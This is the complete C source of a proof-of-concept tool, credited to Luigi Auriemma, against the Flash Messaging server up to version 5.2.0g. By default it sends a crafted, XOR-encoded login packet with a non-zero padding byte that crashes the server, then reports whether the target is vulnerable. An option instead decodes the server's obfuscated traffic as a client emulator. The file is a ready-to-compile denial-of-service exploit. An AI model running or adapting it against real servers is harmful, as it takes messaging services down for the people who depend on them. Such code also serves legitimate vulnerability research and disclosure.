/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
#endif



#define VER     "0.1"
#define PORT    645
#define BUFFSZ  8192
#define TIMEOUT 3
#define LOGIN   "\xd1" "3" \
                "\xd1" "1" \
                "\xd1" "10/07/2004" /* date */ \
                "\xd1" "00.00.00"   /* time (hh.mm.ss) */ \
                "\xd1" \
                "\xd1" \
                "\xd1" "%s"         /* nickname */ \
                "\xd1" \
                "\xd1" "000000" \
                "\xd1"



int timeout(int sock);
void flashmsg_algo(u_char *data, int len);
u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int         sd,
                i,
                len,
                nonull = 0,
                chr    = 0x69;
                /* the normal chr must be 0x00, and if it is different */
                /* causes the immediate crash of the server */
    u_short     port = PORT;
    u_char      buff[BUFFSZ],
                pck[BUFFSZ >> 1],
                *p,
                *nickname = "crash";


    setbuf(stdout, NULL);

    fputs("\n"
        "Flash Messaging <= 5.2.0g (rev 1.1.2) server crash and decoder "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <server>\n"
            "\n"
            "Options:\n"
            "-p PORT   specify the server port (default %d)\n"
            "-s NICK   this tool will act as a client emulator and will show any decoded\n"
            "          message or command sent by the server to you.\n"
            "          You must also specify the nickname you wanna use\n"
            "          By default this tool is a proof-of-concept ables to crash the server\n"
            "-n        use this option to see any server data in a more comprehensible text\n"
            "          format. By default any data block is showed in hexadecimal mode\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    argc--;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'p': port = atoi(argv[++i]); break;
            case 's': {
                chr = 0x00;
                nickname = argv[++i];
                } break;
            case 'n': nonull = 1; break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
            }
        }
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    peer.sin_addr.s_addr = resolv(argv[argc]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr),
        port);
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    fputs("- prepare login data\n", stdout);
    len = snprintf(
        pck,
        sizeof(pck) - 1,
        LOGIN,
        nickname);
    if((len < 0) || (len > sizeof(pck))) {
        fputs("\nError: the nickname you have inserted is longer than my buffer\n\n", stdout);
        exit(1);
    }

    p = buff;
    for(i = 0; i < len; i++) {
        *p++ = pck[i];
        *p++ = chr;
    }

    len <<= 1;
    flashmsg_algo(buff, len);

    fputs("- send login data\n", stdout);
    if(send(sd, buff, len, 0)
      < 0) std_err();

    if(chr) {
        fputs("- check server\n", stdout);
        if((timeout(sd) < 0) || ((len = recv(sd, buff, BUFFSZ, 0)) <= 0)) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem vulnerable, check its decoded reply:\n", stdout);
            show_dump(buff, len, stdout);
        }
    } else {
        for(;;) {
            len = recv(sd, buff, BUFFSZ, 0);
            if(len < 0) std_err();
            if(!len) break;
            flashmsg_algo(buff, len);
            if(nonull) {
                p = buff;
                for(i = 0; i < len; i += 2, p++) {
                    *p = buff[i];
                    if(*p == 0xd1) *p = '\n';   // 0xd1 = delimiter
                }
                *p = 0x00;
                printf("\n--------------------\n%s", buff);
            } else {
                fputc('\n', stdout);
                show_dump(buff, len, stdout);
            }
        }
    }

    close(sd);

    return(0);
}



void flashmsg_algo(u_char *data, int len) {
    int     i;
    const static u_char encdata[] =
            "ScratchIt" "YouFool";

    for(i = 0; i < len; i++) {
        *data++ ^= encdata[i & 15] - 38;
        *data++ ^= 38;
    }
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

